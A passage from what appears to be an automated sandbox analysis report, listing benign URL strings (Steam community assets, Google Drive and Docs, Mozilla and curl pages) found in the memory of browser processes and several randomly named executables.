Source: chrome.exe, 00000014.00000002.3311631555.000010A000020000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstorekgejglhpjiefppelpmljglcjbhoiplfn
Source: chrome.exe, 00000014.00000002.3317180525.00001BA800920000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymity-pa.googleapis.com/
Source: chrome.exe, 00000010.00000003.3086241229.000004900071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3086424995.0000049000728000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.3136288557.00001BA800974000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.3125141088.00001BA80071C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymity-pa.googleapis.com/2%
Source: chrome.exe, 00000014.00000002.3317180525.00001BA800920000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/
Source: chrome.exe, 00000010.00000003.3086241229.000004900071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3086424995.0000049000728000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.3136288557.00001BA800974000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.3125141088.00001BA80071C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/2$
Source: chrome.exe, 00000014.00000002.3317180525.00001BA800920000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/KAnonymityServiceJoinRelayServerhttps://chromekanonym
Source: chrome.exe, 00000014.00000002.3317180525.00001BA800920000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/
Source: chrome.exe, 00000010.00000003.3086241229.000004900071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3086424995.0000049000728000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.3136288557.00001BA800974000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.3125141088.00001BA80071C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/2O
Source: chrome.exe, 00000014.00000002.3311631555.000010A000020000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromewebstore.google.com/
Source: chrome.exe, 00000010.00000003.3082397285.00004218002D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3082441964.00004218002E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.3123698640.000072F8002D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.3123725956.000072F8002E4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clients2.google.com/cr/report
Source: chrome.exe, 00000010.00000003.3095766746.000044C000468000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000002.3311631555.000010A000020000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clients2.google.com/service/update2/crx
Source: firefox.exe, 00000027.00000002.3430306724.00000269D7DC0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://color.firefox.com/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_content=theme-f
Source: d1834e5726.exe, 0000000B.00000002.2699067133.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/
Source: d1834e5726.exe, 0000000B.00000003.2698103352.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2697775389.0000000000AC7000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2698158115.0000000000ACF000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000002.2699067133.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a
Source: d1834e5726.exe, 0000000B.00000003.2697887426.0000000000AC1000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2697775389.0000000000AC7000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2698158115.0000000000ACF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c
Source: d1834e5726.exe, 0000000B.00000003.2697887426.0000000000AC1000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2697775389.0000000000AC7000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2698158115.0000000000ACF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp
Source: d1834e5726.exe, 0000000B.00000003.2697887426.0000000000AC1000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2698103352.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2697775389.0000000000AC7000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2698158115.0000000000ACF000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000002.2699067133.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
Source: d1834e5726.exe, 0000000B.00000003.2697887426.0000000000AC1000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2697775389.0000000000AC7000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2698158115.0000000000ACF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng
Source: d1834e5726.exe, 0000000B.00000003.2697887426.0000000000AC1000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2697775389.0000000000AC7000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2698158115.0000000000ACF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis
Source: d1834e5726.exe, 0000000B.00000003.2697775389.0000000000AC7000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2697913020.0000000000A56000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2698158115.0000000000ACF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: d1834e5726.exe, 0000000B.00000002.2698776978.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2698103352.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2697775389.0000000000AC7000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2698158115.0000000000ACF000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000002.2699067133.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: d1834e5726.exe, 0000000B.00000003.2698103352.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2697775389.0000000000AC7000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2697913020.0000000000A56000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2698158115.0000000000ACF000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000002.2699067133.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
Source: d1834e5726.exe, 0000000B.00000003.2698103352.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2697775389.0000000000AC7000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2697913020.0000000000A56000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2698158115.0000000000ACF000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000002.2699067133.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=Cx79WC7T
Source: d1834e5726.exe, 0000000B.00000003.2698103352.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2697775389.0000000000AC7000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2697913020.0000000000A56000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2698158115.0000000000ACF000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000002.2699067133.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=foEB
Source: d1834e5726.exe, 0000000B.00000003.2697887426.0000000000AC1000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2698103352.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2697775389.0000000000AC7000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2698158115.0000000000ACF000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000002.2699067133.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am
Source: d1834e5726.exe, 0000000B.00000003.2698103352.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000002.2699067133.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-j
Source: d1834e5726.exe, 0000000B.00000003.2697887426.0000000000AC1000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2697775389.0000000000AC7000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2698158115.0000000000ACF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
Source: d1834e5726.exe, 0000000B.00000003.2697887426.0000000000AC1000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2698103352.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2697775389.0000000000AC7000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2698158115.0000000000ACF000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000002.2699067133.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl
Source: d1834e5726.exe, 0000000B.00000003.2697887426.0000000000AC1000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2698103352.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2697775389.0000000000AC7000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2698158115.0000000000ACF000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000002.2699067133.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a
Source: d1834e5726.exe, 0000000B.00000003.2697887426.0000000000AC1000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2698103352.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2697775389.0000000000AC7000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2698158115.0000000000ACF000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000002.2699067133.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a
Source: d1834e5726.exe, 0000000B.00000003.2697887426.0000000000AC1000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2698103352.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2697775389.0000000000AC7000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2698158115.0000000000ACF000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000002.2699067133.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en
Source: d1834e5726.exe, 0000000B.00000003.2697887426.0000000000AC1000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2698103352.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2697775389.0000000000AC7000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2698158115.0000000000ACF000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000002.2699067133.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
Source: d1834e5726.exe, 0000000B.00000003.2697887426.0000000000AC1000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2697775389.0000000000AC7000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2698158115.0000000000ACF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e
Source: d1834e5726.exe, 0000000B.00000003.2697887426.0000000000AC1000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2698103352.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2697775389.0000000000AC7000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2698158115.0000000000ACF000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000002.2699067133.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
Source: d1834e5726.exe, 0000000B.00000003.2697887426.0000000000AC1000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2697775389.0000000000AC7000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2698158115.0000000000ACF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=ImL_uti9QFBw&l=e
Source: d1834e5726.exe, 0000000B.00000003.2697887426.0000000000AC1000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2697775389.0000000000AC7000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2698158115.0000000000ACF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
Source: d1834e5726.exe, 0000000B.00000003.2698158115.0000000000ACF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
Source: d1834e5726.exe, 0000000B.00000003.2697887426.0000000000AC1000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2697775389.0000000000AC7000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2698158115.0000000000ACF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en
Source: d1834e5726.exe, 0000000B.00000003.2697887426.0000000000AC1000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2698103352.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2697775389.0000000000AC7000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2698158115.0000000000ACF000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000002.2699067133.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
Source: d1834e5726.exe, 0000000B.00000003.2697775389.0000000000AC7000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2698158115.0000000000ACF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: d1834e5726.exe, 0000000B.00000003.2697775389.0000000000AC7000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2698158115.0000000000ACF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: d1834e5726.exe, 0000000B.00000003.2697775389.0000000000AC7000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2698158115.0000000000ACF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
Source: d1834e5726.exe, 0000000B.00000003.2697775389.0000000000AC7000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2698158115.0000000000ACF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: d1834e5726.exe, 0000000B.00000003.2697887426.0000000000AC1000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2698103352.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2697775389.0000000000AC7000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2698158115.0000000000ACF000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000002.2699067133.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
Source: d1834e5726.exe, 0000000B.00000003.2697887426.0000000000AC1000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2698103352.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2697775389.0000000000AC7000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2698158115.0000000000ACF000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000002.2699067133.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
Source: d1834e5726.exe, 0000000B.00000003.2697887426.0000000000AC1000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2697775389.0000000000AC7000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2698158115.0000000000ACF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
Source: d1834e5726.exe, 0000000B.00000003.2697887426.0000000000AC1000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2698103352.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2697775389.0000000000AC7000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2698158115.0000000000ACF000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000002.2699067133.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
Source: d1834e5726.exe, 0000000B.00000003.2698103352.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000002.2699067133.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly0
Source: ccdb824191.exe, 0000000F.00000003.3205040006.00000000059C7000.00000004.00000800.00020000.00000000.sdmp, ccdb824191.exe, 0000000F.00000003.3204434338.00000000059C6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3423342277.00000269D79AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3467663342.00000269DBC6D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: ccdb824191.exe, 0000000F.00000003.3205040006.00000000059C7000.00000004.00000800.00020000.00000000.sdmp, ccdb824191.exe, 0000000F.00000003.3204434338.00000000059C6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3423342277.00000269D79AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3467663342.00000269DBC6D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
Source: firefox.exe, 00000027.00000002.3417660527.00000269CC230000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3417660527.00000269CC211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://crash-reports.mozilla.com/submit?id=
Source: 2656cd82fe.exe, 0000000D.00000003.2838596176.000000000751C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://curl.se/docs/alt-svc.html
Source: 2656cd82fe.exe, 0000000D.00000003.2838596176.000000000751C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://curl.se/docs/hsts.html
Source: 4b8eda303b.exe, 0000000C.00000003.2728432336.0000000007E31000.00000004.00001000.00020000.00000000.sdmp, 2656cd82fe.exe, 0000000D.00000002.2880704353.0000000000F1D000.00000040.00000001.01000000.0000000B.sdmp, 2656cd82fe.exe, 0000000D.00000003.2838596176.000000000751C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://curl.se/docs/http-cookies.html
Source: firefox.exe, 00000027.00000002.3437424456.00000269D8303000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/en-US/Add-ons/WebExtensions/manifest.json/commands#Key_combinations
Source: firefox.exe, 00000027.00000002.3437424456.00000269D8303000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/en-US/Add-ons/WebExtensions/manifest.json/commands#Key_combinationsCom
Source: chrome.exe, 00000010.00000003.3095766746.000044C000468000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/
Source: chrome.exe, 00000010.00000003.3097294012.000044C000660000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/:
Source: chrome.exe, 00000010.00000003.3097294012.000044C000660000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/?usp=installed_webapp
Source: chrome.exe, 00000010.00000003.3097294012.000044C000660000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/J
Source: chrome.exe, 00000010.00000003.3097294012.000044C000660000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_default
Source: chrome.exe, 00000010.00000003.3097294012.000044C000660000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/presentation/:
Source: chrome.exe, 00000010.00000003.3097294012.000044C000660000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/presentation/?usp=installed_webapp
Source: chrome.exe, 00000010.00000003.3097294012.000044C000660000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/presentation/J
Source: chrome.exe, 00000010.00000003.3097294012.000044C000660000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/presentation/installwebapp?usp=chrome_default
Source: chrome.exe, 00000010.00000003.3097294012.000044C000660000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/spreadsheets/:
Source: chrome.exe, 00000010.00000003.3097294012.000044C000660000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/spreadsheets/?usp=installed_webapp
Source: chrome.exe, 00000010.00000003.3097294012.000044C000660000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/spreadsheets/J
Source: chrome.exe, 00000010.00000003.3097294012.000044C000660000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/spreadsheets/installwebapp?usp=chrome_default
Source: chrome.exe, 00000010.00000003.3095766746.000044C000468000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-autopush.corp.google.com/
Source: chrome.exe, 00000010.00000003.3095766746.000044C000468000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-daily-0.corp.google.com/
Source: chrome.exe, 00000010.00000003.3095766746.000044C000468000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-daily-1.corp.google.com/
Source: chrome.exe, 00000010.00000003.3095766746.000044C000468000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-daily-2.corp.google.com/
Source: chrome.exe, 00000010.00000003.3095766746.000044C000468000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-daily-3.corp.google.com/
Source: chrome.exe, 00000010.00000003.3095766746.000044C000468000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-daily-4.corp.google.com/
Source: chrome.exe, 00000010.00000003.3095766746.000044C000468000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-daily-5.corp.google.com/
Source: chrome.exe, 00000010.00000003.3095766746.000044C000468000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-daily-6.corp.google.com/
Source: chrome.exe, 00000010.00000003.3095766746.000044C000468000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-preprod.corp.google.com/
Source: chrome.exe, 00000010.00000003.3095766746.000044C000468000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-staging.corp.google.com/
Source: chrome.exe, 00000010.00000003.3113175567.000044C000474000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-thirdparty.googleusercontent.com/32/type/
Source: chrome.exe, 00000010.00000003.3095766746.000044C000468000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/
Source: chrome.exe, 00000010.00000003.3097294012.000044C000660000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/:
Source: chrome.exe, 00000010.00000003.3097294012.000044C000660000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/?lfhs=2
Source: chrome.exe, 00000010.00000003.3097294012.000044C000660000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/J
Source: chrome.exe, 00000010.00000003.3097294012.000044C000660000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/drive/installwebapp?usp=chrome_default
